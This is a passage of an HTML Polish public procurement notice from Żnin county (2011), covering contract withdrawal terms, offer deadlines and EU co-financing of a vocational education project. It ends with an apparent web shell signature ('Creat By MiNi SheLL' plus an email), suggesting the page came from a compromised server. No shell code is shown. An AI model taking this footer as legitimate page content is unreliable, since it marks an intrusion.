1) W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewiedzieć w chwili zawarcia umowy,  zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach,
2) W przypadku o którym mowa w niniejszym ustępie pkt 1, Wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu wykonania części umowy.
10. Zamawiający nie przewiduje zawarcia umowy ramowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.znin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żninie,  ul. Potockiego 1 biuro nr 12 I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2011 godzina 09:00, miejsce: Starostwo Powiatowe w Żninie ul. Potockiego 1 Sekretariat Starosty Żnińskiego - pokój nr 19 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, Projektu Nowa jakość kształcenia zawodowego w Powiecie Żnińskim nr WND-POKL.09.02.00-04-019-10..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com